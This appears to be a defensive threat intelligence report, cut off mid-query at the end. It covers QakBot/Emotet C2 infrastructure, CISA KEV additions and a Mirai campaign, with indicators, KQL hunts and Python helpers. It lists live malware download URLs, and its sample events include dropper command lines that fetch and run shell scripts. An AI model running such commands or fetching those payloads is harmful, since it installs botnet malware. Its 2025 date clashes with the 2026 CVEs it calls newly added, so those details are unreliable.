โ† Back to Dashboard
May 10, 2026

Daily Threat Intelligence Report — 2025-07-14

32 IOCs | 12 TTPs | 15 KQL Queries
Executive Summary

Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed by Feodotracker: four QakBot C2 IPs and one Emotet C2 IP, spanning US, UK, and Japanese hosting, are actively serving malicious traffic. Concurrently, CISA has added five critical vulnerabilities to the Known Exploited Vulnerabilities catalogue, including an unauthenticated RCE in Palo Alto Networks PAN-OS (CVE-2026-0300) and an authentication bypass in cPanel & WHM (CVE-2026-41940), both of which pose immediate exploitation risk to enterprise environments. A sustained Mirai botnet campaign targeting Linux-based IoT and server infrastructure is evidenced by multiple ELF-format samples and active malware download URLs observed via URLhaus and MalwareBazaar. SOC teams should immediately block all five Feodotracker C2 IPs, apply the CISA KEV patches on an emergency basis, and run the KQL hunts across MDE and Sentinel environments.

#1

Active QakBot and Emotet C2 Infrastructure — Multi-Region Banking Trojan Campaign

Severity: CRITICAL | Attributed actor: TA505

Feodotracker has confirmed five active command-and-control IP addresses in the last 24 hours serving QakBot (four IPs: 50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) and Emotet (one IP: 162.243.103.246) malware families, spanning US, UK, and Japanese hosting infrastructure. QakBot is a sophisticated banking trojan and initial access broker payload historically leveraged by TA505 and affiliated ransomware operators to establish persistent footholds prior to post-exploitation activity including credential harvesting, lateral movement, and ransomware deployment. Emotet, previously dismantled by law enforcement in 2021 and subsequently resurrected, operates as a modular malware loader and spam botnet that downloads secondary payloads including QakBot itself, representing a compounding risk when both families are simultaneously active. Any outbound connection from an enterprise endpoint to these five IPs should be treated as a confirmed compromise indicator requiring immediate endpoint isolation and forensic investigation.

🔴 Indicators of Compromise
IP 162.243.103.246 Emotet C2 server hosted in US — Feodotracker confirmed active within last 24 hours
IP 50.16.16.211 QakBot C2 server hosted in US — Feodotracker confirmed active within last 24 hours
IP 34.204.119.63 QakBot C2 server hosted in US — Feodotracker confirmed active within last 24 hours
IP 178.62.3.223 QakBot C2 server hosted in GB — Feodotracker confirmed active within last 24 hours
IP 27.133.154.218 QakBot C2 server hosted in JP — Feodotracker confirmed active within last 24 hours
HASH 846a2e3a606c07e5497cda85364879b8ff31009a4526d75a7d1ab0d06c71b948 AsyncRAT EXE sample — commonly deployed as secondary payload post-QakBot/Emotet infection; MalwareBazaar confirmed
HASH cceabfe8bae493c1eaa774971a5159a97a299babd4759a9ebc6016da6edc420d GCleaner dropper (MIX5.file) EXE — GCleaner is a pay-per-install malware distributor known to drop QakBot and Emotet; MalwareBazaar confirmed
HASH fc5065fd93db1ea903ac75a2e383b147beb1234acab258494efbb84191ed872a GCleaner dropper (MIX4.file) EXE — secondary GCleaner sample corroborating active dropper campaign; MalwareBazaar confirmed
URL https://cmd.cloudflowops.co/c2cb43a1-3db9-486a-a707-ee88bcdb4813/google.ocx Active malware download URL serving malicious OCX payload — URLhaus confirmed; cloudflowops.co infrastructure used across multiple download endpoints
URL https://metaviewhub.cloudflowops.co/c2cb43a1-3db9-486a-a707-ee88bcdb4813/google.ocx Active malware download URL — same campaign GUID and payload as cmd.cloudflowops.co; URLhaus confirmed
URL https://sync.cloudflowops.co/c2cb43a1-3db9-486a-a707-ee88bcdb4813/google.ocx Active malware download URL — third cloudflowops.co subdomain serving identical google.ocx payload with same campaign GUID; URLhaus confirmed
🟣 MITRE ATT&CK TTPs
T1566.001 Spearphishing Attachment
T1071.001 Application Layer Protocol — Web Protocols C2
T1055 Process Injection
T1078 Valid Accounts
🟢 Hunt Queries
MDE Hunt for C2 Connections to QakBot and Emotet Feodotracker Infrastructure

Detects outbound network connections to all five Feodotracker-confirmed QakBot and Emotet C2 servers observed active in the last 24 hours. Any match should be treated as a high-confidence compromise indicator.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Detect GCleaner Dropper and AsyncRAT Payload Execution by Hash

Identifies execution or file creation events matching confirmed MalwareBazaar hashes for GCleaner dropper samples and AsyncRAT payload associated with QakBot/Emotet delivery chains.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    'cceabfe8bae493c1eaa774971a5159a97a299babd4759a9ebc6016da6edc420d',
    'fc5065fd93db1ea903ac75a2e383b147beb1234acab258494efbb84191ed872a',
    '846a2e3a606c07e5497cda85364879b8ff31009a4526d75a7d1ab0d06c71b948'
)
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect Downloads from cloudflowops.co Malware Distribution Infrastructure

Identifies network connections or file downloads from the cloudflowops.co malware distribution infrastructure confirmed by URLhaus, which is serving malicious google.ocx payloads across multiple subdomains.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteUrl has 'cloudflowops.co'
    or RemoteUrl has 'google.ocx'
    or RemoteUrl has 'c2cb43a1-3db9-486a-a707-ee88bcdb4813'
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDI Detect Lateral Movement via Excessive NTLM Authentication — Post QakBot Credential Harvesting

Hunts for accounts performing high-volume NTLM authentications indicative of credential stuffing or lateral movement following QakBot credential harvest activity.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where Protocol == 'Ntlm'
| summarize LogonCount=count(), UniqueDevices=dcount(DeviceName), TargetDevices=make_set(DeviceName) by AccountDisplayName, IPAddress
| where LogonCount > 5 or UniqueDevices > 3
| order by LogonCount desc
SENTINEL Detect Connections to QakBot/Emotet C2 IPs Across All Log Sources

Broad Sentinel query across CommonSecurityLog, AzureFirewallLog, and DNS logs to identify any traffic to Feodotracker-confirmed QakBot and Emotet C2 infrastructure from any network segment.

let c2_ips = dynamic(['162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218']);
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationIP in (c2_ips) or SourceIP in (c2_ips)
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor, DeviceProduct
| order by TimeGenerated desc
✅ Recommended Actions
→ IMMEDIATE: Block all five Feodotracker C2 IPs (162.243.103.246, 50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) at perimeter firewall, proxy, and NGFW — apply in both inbound and outbound directions
→ IMMEDIATE: Submit all three MalwareBazaar hashes (cceabfe8..., fc5065fd..., 846a2e3a...) to EDR/AV platform for immediate blocking and retrospective scan across all endpoints
→ IMMEDIATE: Block cloudflowops.co and all subdomains (cmd, metaviewhub, sync) at DNS, proxy, and web gateway level — URLhaus confirmed active malware distribution
→ IMMEDIATE: Run all five KQL hunt queries across MDE, MDI, and Sentinel environments and escalate any matches to Tier 2 for immediate investigation
→ SHORT-TERM: Isolate any endpoint that generated a connection to the five C2 IPs — treat as confirmed compromise, initiate forensic triage and memory acquisition
→ SHORT-TERM: Review email gateway quarantine for Office documents with macros or HTML smuggling payloads received in the last 7 days — expand hunting window to cover pre-detection activity
→ SHORT-TERM: Validate that network segmentation prevents lateral NTLM propagation — review MDI alert thresholds for account lateral movement detection
→ LONG-TERM: Onboard Feodotracker feed as automated SIEM/SOAR enrichment source to ensure sub-hourly C2 IP blocklist updates without manual intervention
→ LONG-TERM: Review GCleaner pay-per-install exposure — audit software installation policies and application allowlisting to prevent dropper execution
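As an added example for the Feodotracker automation action above (not code from this report or from abuse.ch), the Python below parses a feed laid out like Feodotracker's ipblocklist.csv, drops offline and malformed rows, and emits the `let c2_ips = dynamic([...]);` line that the Sentinel hunt in this section uses, plus a perimeter blocklist. The column order is assumed from the public feed and the sample rows are constructed from the five IPs in this report.

```python
"""Turn a Feodotracker-style C2 IP feed into a KQL `let` line and a blocklist."""
import csv
import io
import ipaddress

# Constructed sample laid out like Feodotracker's ipblocklist.csv (assumed column
# order: first_seen_utc,dst_ip,dst_port,c2_status,last_online,malware). The rows
# reuse the five IPs from this report plus two deliberately bad rows; this is
# not a real feed snapshot.
SAMPLE_FEED = """\
################################################################
# Feodo Tracker Botnet C2 IP Blocklist (constructed sample)    #
################################################################
first_seen_utc,dst_ip,dst_port,c2_status,last_online,malware
2025-07-13 21:10:07,162.243.103.246,8080,online,2025-07-14,Emotet
2025-07-13 18:02:44,50.16.16.211,443,online,2025-07-14,QakBot
2025-07-13 17:41:19,34.204.119.63,443,online,2025-07-14,QakBot
2025-07-13 09:55:02,178.62.3.223,2222,online,2025-07-14,QakBot
2025-07-12 23:12:38,27.133.154.218,995,online,2025-07-14,QakBot
2025-06-01 04:00:00,203.0.113.7,443,offline,2025-06-03,QakBot
2025-07-13 12:00:00,not-an-ip,443,online,2025-07-14,QakBot
"""


def parse_feed(text, families=None):
    """Return online C2 rows, optionally restricted to the given malware families.

    Comment lines ('#') are dropped before CSV parsing. Offline entries and rows
    whose dst_ip does not parse are skipped so one bad line cannot poison the
    blocklist or break the generated KQL.
    """
    lines = [ln for ln in text.splitlines() if ln and not ln.startswith("#")]
    rows = []
    for row in csv.DictReader(io.StringIO("\n".join(lines))):
        if row["c2_status"].strip().lower() != "online":
            continue
        if families and row["malware"] not in families:
            continue
        try:
            ip = ipaddress.ip_address(row["dst_ip"].strip())
        except ValueError:
            continue  # malformed entry, drop it
        rows.append({"ip": str(ip), "port": int(row["dst_port"]),
                     "malware": row["malware"], "last_online": row["last_online"]})
    return rows


def kql_let(rows, name="c2_ips"):
    """Render the `let <name> = dynamic([...]);` line used by the Sentinel hunt."""
    ips = sorted({r["ip"] for r in rows}, key=ipaddress.ip_address)
    quoted = ", ".join(f"'{ip}'" for ip in ips)
    return f"let {name} = dynamic([{quoted}]);"


def blocklist_lines(rows):
    """One 'ip port malware' line per C2 for a perimeter blocklist import."""
    return [f"{r['ip']} {r['port']} {r['malware']}" for r in rows]


if __name__ == "__main__":
    online = parse_feed(SAMPLE_FEED, families={"QakBot", "Emotet"})
    print(kql_let(online))
    print("\n".join(blocklist_lines(online)))
```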
#2

Critical CISA KEV Additions — Unauthenticated RCE in PAN-OS and Authentication Bypass in cPanel/WHM Demand Emergency Patching

Severity: HIGH | Attributed actor: Unknown

CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalogue today, with two representing the highest immediate risk to enterprise environments: CVE-2026-0300 in Palo Alto Networks PAN-OS, an out-of-bounds write vulnerability in the User-ID Authentication Portal (Captive Portal) service allowing unauthenticated remote code execution with root privileges on PA-Series and VM-Series firewalls; and CVE-2026-41940 in WebPros cPanel & WHM, an authentication bypass in the login flow enabling unauthenticated remote attackers to gain full control panel access. Additionally, CVE-2026-6973 in Ivanti EPMM allows authenticated remote code execution for any administrator-level user, CVE-2026-42208 in BerriAI LiteLLM enables SQL injection leading to credential theft from AI proxy infrastructure, and CVE-2026-31431 in the Linux Kernel enables local privilege escalation via incorrect resource transfer. CISA's inclusion of these vulnerabilities in the KEV catalogue confirms active in-the-wild exploitation; federal agencies are under BOD 22-01 mandate to patch, and private sector organizations should treat these as emergency remediation priorities.

🔴 Indicators of Compromise
CVE CVE-2026-0300 Palo Alto Networks PAN-OS — unauthenticated out-of-bounds write RCE with root privileges via Captive Portal service on PA-Series and VM-Series firewalls; CISA KEV confirmed actively exploited
CVE CVE-2026-41940 WebPros cPanel & WHM and WP2 — authentication bypass in login flow allowing unauthenticated remote full control panel access; CISA KEV confirmed actively exploited
CVE CVE-2026-6973 Ivanti EPMM — improper input validation enabling remotely authenticated admin-level user to achieve RCE; CISA KEV confirmed actively exploited
CVE CVE-2026-42208 BerriAI LiteLLM — SQL injection allowing attacker to read and potentially modify proxy database including managed credentials; CISA KEV confirmed actively exploited
CVE CVE-2026-31431 Linux Kernel — incorrect resource transfer between spheres enabling local privilege escalation; CISA KEV confirmed actively exploited
URL https://getcfghubs.techopsruntime.pics/99c7fa93-4d32-47c2-84f9-163f7755f5e3/check.rock Active malware download URL hosted on techopsruntime.pics — may be used for post-exploitation payload delivery following successful vulnerability exploitation; URLhaus confirmed
URL https://ipnodeclis.techopsruntime.pics/99c7fa93-4d32-47c2-84f9-163f7755f5e3/check.rock Active malware download URL — second techopsruntime.pics subdomain serving identical check.rock payload with same campaign GUID; URLhaus confirmed
🟣 MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application
T1068 Exploitation for Privilege Escalation
T1110.002 Credential Access — SQL Injection
T1105 Ingress Tool Transfer
🟢 Hunt Queries
MDE Detect Exploitation Attempts Against PAN-OS Captive Portal (CVE-2026-0300)

Identifies network activity patterns consistent with exploitation of the PAN-OS Captive Portal out-of-bounds write vulnerability — specifically looking for anomalous process execution on firewall management systems or unexpected outbound connections indicative of post-exploitation activity.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where DeviceName has_any ('panos', 'panorama', 'firewall', 'pa-')
| where InitiatingProcessFileName in~ ('sshd', 'httpd', 'nginx', 'python', 'python3', 'sh', 'bash')
| where ProcessCommandLine has_any ('curl', 'wget', 'chmod', 'python', '/tmp/', 'base64', 'nc ', 'ncat')
| project TimeGenerated, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated desc
MDE Detect Downloads from techopsruntime.pics Malware Distribution Infrastructure

Identifies connections to the URLhaus-confirmed techopsruntime.pics malware distribution infrastructure serving check.rock payloads, which may be downloaded as post-exploitation tools following KEV vulnerability exploitation.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteUrl has 'techopsruntime.pics'
    or RemoteUrl has 'check.rock'
    or RemoteUrl has '99c7fa93-4d32-47c2-84f9-163f7755f5e3'
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Detect cPanel and Ivanti EPMM Authentication Anomalies — KEV CVE-2026-41940 and CVE-2026-6973

Identifies anomalous authentication patterns against cPanel/WHM and Ivanti EPMM management interfaces that may indicate exploitation of authentication bypass (CVE-2026-41940) or post-authentication RCE (CVE-2026-6973) vulnerabilities.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('/cpanel', '/whm', '/cpsess', ':2082', ':2083', ':2086', ':2087', '/epmm', '/mifs', '/api/v1/admin')
| where Activity has_any ('401', '403', '200', 'authentication', 'login', 'bypass')
| summarize RequestCount=count(), UniqueSources=dcount(SourceIP), SourceIPs=make_set(SourceIP) by RequestURL, Activity, bin(TimeGenerated, 5m)
| where RequestCount > 10 or UniqueSources > 3
| order by RequestCount desc
SENTINEL Detect Linux Kernel Privilege Escalation Indicators — CVE-2026-31431

Hunts for Linux host privilege escalation behavioural indicators consistent with CVE-2026-31431 exploitation — specifically unexpected root-level process spawning from non-privileged parent processes.

Syslog
| where TimeGenerated > ago(24h)
| where Facility == 'kern' or ProcessName in ('sudo', 'su', 'pkexec', 'dbus-daemon')
| where SyslogMessage has_any ('privilege', 'escalat', 'setuid', 'capability', 'exploit', 'ptrace', 'userns')
    or SyslogMessage matches regex @'uid=0.*euid=0'
| project TimeGenerated, Computer, ProcessName, SyslogMessage
| order by TimeGenerated desc
MDI Detect Anomalous Admin Account Activity Following Potential Ivanti EPMM Compromise

Identifies unusual administrative authentication patterns that may indicate post-exploitation lateral movement following Ivanti EPMM (CVE-2026-6973) compromise by a threat actor using harvested admin credentials.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where AccountName has_any ('admin', 'administrator', 'svc', 'service')
| summarize LogonCount=count(), UniqueDevices=dcount(DeviceName), UniqueIPs=dcount(IPAddress), DeviceList=make_set(DeviceName) by AccountDisplayName, AccountName
| where LogonCount > 10 or UniqueDevices > 5
| order by LogonCount desc
✅ Recommended Actions
→ IMMEDIATE: Apply Palo Alto Networks PAN-OS patch for CVE-2026-0300 on all PA-Series and VM-Series firewalls — until patch is available, restrict User-ID Authentication Portal (Captive Portal) to trusted zones only, and disable if not operationally required per CISA guidance
→ IMMEDIATE: Apply WebPros cPanel & WHM patch for CVE-2026-41940 — if patch unavailable, restrict cPanel/WHM management port access (2082/2083/2086/2087) to trusted management IP ranges only via firewall ACL
→ IMMEDIATE: Apply Ivanti EPMM patch for CVE-2026-6973 — audit all administrative accounts in EPMM for unauthorized access or suspicious activity in the last 72 hours
→ IMMEDIATE: Block techopsruntime.pics and all subdomains at DNS and web proxy level — URLhaus confirmed active malware distribution
→ URGENT: Audit all BerriAI LiteLLM deployments for CVE-2026-42208 — rotate all API credentials and service tokens managed by LiteLLM proxy immediately if patching cannot be completed within 4 hours
→ URGENT: Apply Linux Kernel patches for CVE-2026-31431 on all internet-facing and high-value Linux hosts — prioritize based on exposure profile
→ SHORT-TERM: Run all five KQL queries across Sentinel, MDE, and MDI to identify exploitation indicators in the environment
→ SHORT-TERM: Validate vulnerability scanner coverage for all five CISA KEV CVEs — confirm asset inventory includes all PAN-OS, Ivanti EPMM, cPanel/WHM, LiteLLM, and Linux kernel versions in scope
→ LONG-TERM: Integrate CISA KEV feed into vulnerability management platform for automated priority escalation of KEV-listed CVEs to P1/emergency remediation SLA
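As an added example for the KEV-feed integration action above (not code from this report or from CISA), the Python below matches a KEV snapshot in the field layout of CISA's known_exploited_vulnerabilities.json against an asset inventory and ranks the findings by exposure and due date. The snapshot entries reuse this report's five CVEs, but their due dates, the ransomware flags, the alias table and the inventory are all constructed; version applicability still has to come from the vulnerability scanner.

```python
"""Match a CISA KEV catalogue snapshot against an asset inventory and rank the work."""
import json
from datetime import date

# Constructed snapshot using the field names of CISA's
# known_exploited_vulnerabilities.json (a top-level "vulnerabilities" list).
# Entries reuse the five KEV additions in this report; dueDate values and
# ransomware flags are made up for the example, not taken from CISA.
KEV_JSON = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2026-0300", "vendorProject": "Palo Alto Networks", "product": "PAN-OS",
     "dateAdded": "2025-07-14", "dueDate": "2025-07-21", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2026-41940", "vendorProject": "WebPros", "product": "cPanel & WHM",
     "dateAdded": "2025-07-14", "dueDate": "2025-07-21", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2026-6973", "vendorProject": "Ivanti", "product": "EPMM",
     "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2026-42208", "vendorProject": "BerriAI", "product": "LiteLLM",
     "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2026-31431", "vendorProject": "Linux", "product": "Kernel",
     "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Known"},
]})

# Constructed asset inventory (hostnames and product spellings are made up).
INVENTORY = [
    {"host": "fw-edge-01", "vendor": "Palo Alto Networks", "product": "PAN-OS", "internet_facing": True},
    {"host": "whm-hosting-02", "vendor": "WebPros", "product": "cpanel whm", "internet_facing": True},
    {"host": "mdm-01", "vendor": "Ivanti", "product": "Endpoint Manager Mobile (EPMM)", "internet_facing": True},
    {"host": "ai-proxy-01", "vendor": "BerriAI", "product": "LiteLLM", "internet_facing": False},
    {"host": "db-01", "vendor": "Linux", "product": "Kernel", "internet_facing": False},
    {"host": "print-01", "vendor": "Linux", "product": "Kernel", "internet_facing": False},
    {"host": "hr-app-01", "vendor": "ExampleCorp", "product": "TimeSheets", "internet_facing": True},
]

# Inventory spellings that differ from the KEV product string (constructed alias table).
ALIASES = {"endpointmanagermobileepmm": "epmm"}


def _norm(s):
    """Lower-case, strip punctuation and whitespace, then apply the alias table."""
    key = "".join(ch for ch in s.lower() if ch.isalnum())
    return ALIASES.get(key, key)


def load_kev(text):
    return json.loads(text)["vulnerabilities"]


def match_inventory(kev, inventory, today):
    """Return one finding per (asset, KEV entry) whose vendor and product match.

    Matching is on normalised vendor+product strings; version applicability is
    not checked here and must come from the vulnerability scanner.
    """
    by_key = {}
    for v in kev:
        by_key.setdefault((_norm(v["vendorProject"]), _norm(v["product"])), []).append(v)
    findings = []
    for asset in inventory:
        for v in by_key.get((_norm(asset["vendor"]), _norm(asset["product"])), []):
            due = date.fromisoformat(v["dueDate"])
            findings.append({
                "host": asset["host"], "cve": v["cveID"],
                "internet_facing": asset["internet_facing"],
                "days_to_due": (due - today).days,
                "ransomware_use": v["knownRansomwareCampaignUse"] == "Known",
            })
    # Internet-facing first, then soonest due date, then ransomware-linked entries.
    findings.sort(key=lambda f: (not f["internet_facing"], f["days_to_due"], not f["ransomware_use"]))
    return findings


def sla_tier(finding):
    """P1 for internet-facing or overdue findings, P2 for ransomware-linked, else P3."""
    if finding["internet_facing"] or finding["days_to_due"] < 0:
        return "P1"
    return "P2" if finding["ransomware_use"] else "P3"


if __name__ == "__main__":
    for f in match_inventory(load_kev(KEV_JSON), INVENTORY, date(2025, 7, 15)):
        print(f"{sla_tier(f)} {f['host']:<15} {f['cve']:<15} due in {f['days_to_due']:>3} days")
```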
#3

Active Mirai/Gafgyt Botnet Expansion Campaign — Multiple ELF Samples and IoT Exploitation Infrastructure Observed

Severity: MEDIUM | Attributed actor: Unknown

MalwareBazaar has confirmed four distinct Mirai-family ELF binary samples in the last 24 hours, including one tagged with Gafgyt (a competing IoT botnet family sharing infrastructure overlap with Mirai), indicating active botnet expansion recruitment targeting Linux-based IoT devices, routers, and unpatched servers. URLhaus corroborates this campaign with three active malware download endpoints serving shell scripts and binaries via non-standard high ports from IP addresses 119.52.128.201, 140.237.38.80, 117.26.82.69, and 42.235.88.133, with payloads including bin.sh (shell-based dropper) and unlabeled binary downloads. The CVE-2026-31431 Linux kernel privilege escalation vulnerability added to CISA KEV today may be leveraged by botnet operators to elevate privileges on partially compromised Linux hosts to achieve persistent Mirai implantation. GitHub maltrail updates to netsupport.txt and fakeapp.txt further suggest parallel delivery of remote access tools via fake application lures that may serve as the initial infection vector for compromised endpoints subsequently recruited into the botnet.

🔴 Indicators of Compromise
HASH 1394f1bb91eb2cb5bdc1dd3724f5b39302d5498d78ef44a688d955551c55b6b1 Mirai ELF binary — UPX-decoded Linux botnet implant; MalwareBazaar confirmed
HASH 07207f62578f69a793e5f1560c923f24b3512e97b6f9034f5df797f7eb253d74 Mirai/Gafgyt ELF binary — UPX-packed; tagged Gafgyt indicating possible dual-family infrastructure overlap; MalwareBazaar confirmed
HASH 42e118f15398e7467639346573f8934badb6ceee6b4a666e5d8690dd292c34f9 Mirai ELF binary — uncompressed Linux botnet implant; MalwareBazaar confirmed
HASH 742802ec096b21b214403c59685216f585a48def35769d8a75ff805a8d5e690a Mirai ELF binary — Linux botnet implant variant; MalwareBazaar confirmed
HASH b03c21000c03bb01455f622d56c8b074bb3a1b1586f79ca8279456916016a13f NanoCore RAT EXE — Windows remote access trojan; may be used in parallel campaign delivering RATs via fake application lures per maltrail fakeapp.txt update; MalwareBazaar confirmed
IP 119.52.128.201 Active malware download server — serving both /i binary and /bin.sh dropper via non-standard port 54273; URLhaus confirmed
IP 140.237.38.80 Active malware download server — serving /i binary payload via non-standard port 56569; URLhaus confirmed
IP 117.26.82.69 Active malware download server — serving bin.sh shell dropper via non-standard port 50794; URLhaus confirmed
IP 42.235.88.133 Active malware download server — serving /i binary payload via non-standard port 55090; URLhaus confirmed
URL http://119.52.128.201:54273/bin.sh Active Mirai dropper shell script download URL — direct IP-based delivery on non-standard high port to evade domain-based filtering; URLhaus confirmed
URL http://117.26.82.69:50794/bin.sh Active Mirai dropper shell script download URL — secondary distribution server for bin.sh payload; URLhaus confirmed
URL http://119.52.128.201:54273/i Active Mirai binary download URL — unlabeled binary payload served alongside bin.sh from same server; URLhaus confirmed
URL http://140.237.38.80:56569/i Active Mirai binary download URL — additional distribution server; URLhaus confirmed
URL http://42.235.88.133:55090/i Active Mirai binary download URL — fourth distribution server for /i payload; URLhaus confirmed
🟣 MITRE ATT&CK TTPs
T1595.001 Active Scanning — Scanning IP Blocks
T1496 Resource Hijacking
T1059.004 Command and Scripting Interpreter — Unix Shell
T1110.001 Brute Force — Password Guessing
🟢 Hunt Queries
MDE Detect Mirai/Gafgyt ELF Binary File Creation and Execution by Hash

Identifies creation or execution of confirmed Mirai and Gafgyt ELF binaries on managed Linux endpoints using MalwareBazaar-confirmed SHA256 hashes.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    '1394f1bb91eb2cb5bdc1dd3724f5b39302d5498d78ef44a688d955551c55b6b1',
    '07207f62578f69a793e5f1560c923f24b3512e97b6f9034f5df797f7eb253d74',
    '42e118f15398e7467639346573f8934badb6ceee6b4a666e5d8690dd292c34f9',
    '742802ec096b21b214403c59685216f585a48def35769d8a75ff805a8d5e690a',
    'b03c21000c03bb01455f622d56c8b074bb3a1b1586f79ca8279456916016a13f'
)
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect Connections to Mirai Payload Distribution Servers — URLhaus Confirmed IPs

Identifies outbound network connections to all four URLhaus-confirmed Mirai payload distribution servers delivering /i binaries and bin.sh shell droppers.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('119.52.128.201', '140.237.38.80', '117.26.82.69', '42.235.88.133')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect Shell-Based Malware Download Patterns — curl/wget Pipeline Execution

Hunts for curl or wget execution patterns consistent with Mirai's self-propagation mechanism — specifically downloads from non-standard high ports or pipes to shell execution that match the bin.sh delivery pattern confirmed by URLhaus.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName in~ ('wget', 'curl', 'sh', 'bash')
| where ProcessCommandLine has_any (
    '119.52.128.201',
    '140.237.38.80',
    '117.26.82.69',
    '42.235.88.133',
    'bin.sh',
    '/tmp/',
    '/dev/shm/',
    '| bash',
    '| sh',
    'chmod +x'
)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
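As an added example (not code from this report or from Microsoft), the Python below reimplements the logic of the hunt above as a scored rule over constructed DeviceProcessEvents-style command lines, so that a direct-IP, high-port bin.sh fetch ranks well above a routine `curl ... | bash` installer that the flat has_any list would flag identically. The weights, the threshold and the sample command lines are this example's own assumptions; only the four IOC IPs come from the report.

```python
"""Score Linux process command lines for the curl/wget dropper pattern hunted above."""
import re
from urllib.parse import urlsplit

# The four URLhaus-confirmed distribution IPs from this report.
IOC_IPS = {"119.52.128.201", "140.237.38.80", "117.26.82.69", "42.235.88.133"}
WORLD_WRITABLE = ("/tmp/", "/dev/shm/", "/var/tmp/")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\"|;&]+")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba|da|a)?sh\b")
IP_HOST_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed DeviceProcessEvents-style records (not real telemetry).
EVENTS = [
    {"device": "iot-cam-17", "cmd": "wget -qO- http://119.52.128.201:54273/bin.sh | sh"},
    {"device": "web-12", "cmd": "cd /tmp; curl -s http://198.51.100.20:8443/i -o i; chmod +x /tmp/i; /tmp/i"},
    {"device": "build-03", "cmd": "curl -fsSL https://deb.debian.org/debian/dists/stable/Release -o /tmp/Release"},
    {"device": "dev-laptop-9", "cmd": "curl -fsSL https://get.example.com/install.sh | bash"},
    {"device": "nas-02", "cmd": "cd /tmp || cd /var/run; wget http://117.26.82.69:50794/bin.sh; chmod 777 bin.sh; sh bin.sh"},
]


def score_command(cmd):
    """Return (score, reasons) for one command line; higher means more dropper-like.

    Weights are this example's own choices, not a published ruleset: a known IOC
    host dominates, while a lone '| bash' from a named host scores low so routine
    installer one-liners do not drown out the IP-literal, high-port bin.sh pattern.
    """
    score, reasons = 0, []
    for url in URL_RE.findall(cmd):
        parts = urlsplit(url)
        host, port = parts.hostname or "", parts.port
        if host in IOC_IPS:
            score += 5
            reasons.append(f"known IOC host {host}")
        elif IP_HOST_RE.match(host):
            score += 2
            reasons.append(f"IP-literal host {host}")
        if port and port > 1024:
            score += 2
            reasons.append(f"non-standard port {port}")
        if parts.path.endswith("/bin.sh") or parts.path == "/i":
            score += 2
            reasons.append(f"dropper path {parts.path}")
    if PIPE_TO_SHELL_RE.search(cmd):
        score += 3
        reasons.append("pipe to shell")
    if "chmod +x" in cmd and any(d in cmd for d in WORLD_WRITABLE):
        score += 2
        reasons.append("chmod +x in world-writable dir")
    return score, reasons


def triage(events, threshold=4):
    """Return events scoring at or above threshold, highest first."""
    hits = []
    for ev in events:
        score, reasons = score_command(ev["cmd"])
        if score >= threshold:
            hits.append({**ev, "score": score, "reasons": reasons})
    hits.sort(key=lambda h: h["score"], reverse=True)
    return hits


if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(f"{hit['score']:>2} {hit['device']:<14} {'; '.join(hit['reasons'])}")
```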
SENTINEL Detect Mirai Distribution IP Access Across All Network Logs

Broad Sentinel hunt across all log sources for connections to or from the four URLhaus-confirmed Mirai payload distribution IPs, covering firewall, proxy, and endpoint telemetry.

let mirai_ips = dynamic(['119.52.128.201', '140.237.38.80', '117.26.82.69', '42.235.88.133']);
CommonSecurityLog
